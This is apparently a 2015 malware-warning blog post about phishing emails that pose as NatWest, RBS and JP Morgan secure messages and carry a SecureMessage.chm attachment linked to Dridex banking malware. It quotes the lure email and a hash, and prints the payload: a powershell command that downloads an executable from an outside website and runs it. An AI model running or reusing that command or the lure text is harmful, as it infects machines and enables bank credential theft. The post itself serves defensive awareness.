Amazon

Tuesday 28 April 2015

Incident IM / NatWest Secure Message / JP Morgan Access Secure Message

Incident IM / NatWest Secure Message / JP Morgan Access Secure Message SecureMessage.chm  malware.


These emails aren't from these companies at all , they are just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Headers:
From: "Hilda Tyler" {Hilda.Tyler@rbs.co.uk}
Subject: RE: Incident IM03116081

From: "NatWest.co.uk" {secure.message@natwest.com}
Subject: NatWest Secure Message
Message Body:
Good Afternoon ,

Attached are more details regarding your account incident.

Please extract the attached content and check the details.

Please be advised we have raised this as a high priority incident and will endeavour to resolve it as soon as possible. The incident reference for this is IM03116081.

We would let you know once this issue has been resolved, but with any further questions or issues, please let me know.

Kind Regards,

Hilda Tyler

Level 2 Adviser | Customer Experience Team, IB Service & Operations 7th Floor, 1
Hardman Boulevard | Manchester | M3 3AQ | Depot code: 049
Tel: 0845 300 4108 |Email: Hilda.Tyler@bankline.rbs.co.uk The content of this e-mail is CONFIDENTIAL unless stated otherwise

 Attachment:
SecureMessage.chm
Sha256 Hashes:
467f6d76802014ab671fa868b9b81b79497889f906c434620742e391aee17670 [1]
Malware Virus Scanner Reports:
VirusTotal Report: [1] (Detection: 1/79)

Malwr Report: [1]

Hybrid Analysis Report: [1]

Payload (html file inside chm document):

,cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('http://selkirkconed.com/wp-content/uploads/2014/06/Lh1n1 DOT exe','%TEMP%\natmasla2.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla2 DOT exe')">

VirusTotal Report: [2]

NOTE

The current round of Word/Excel/XML attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

2 comments:

Gill said...

We are also seeing these as "JP Morgan Access Secure Message"

lupinehorror said...

it appears to come from the RBS network though
155.136.80.33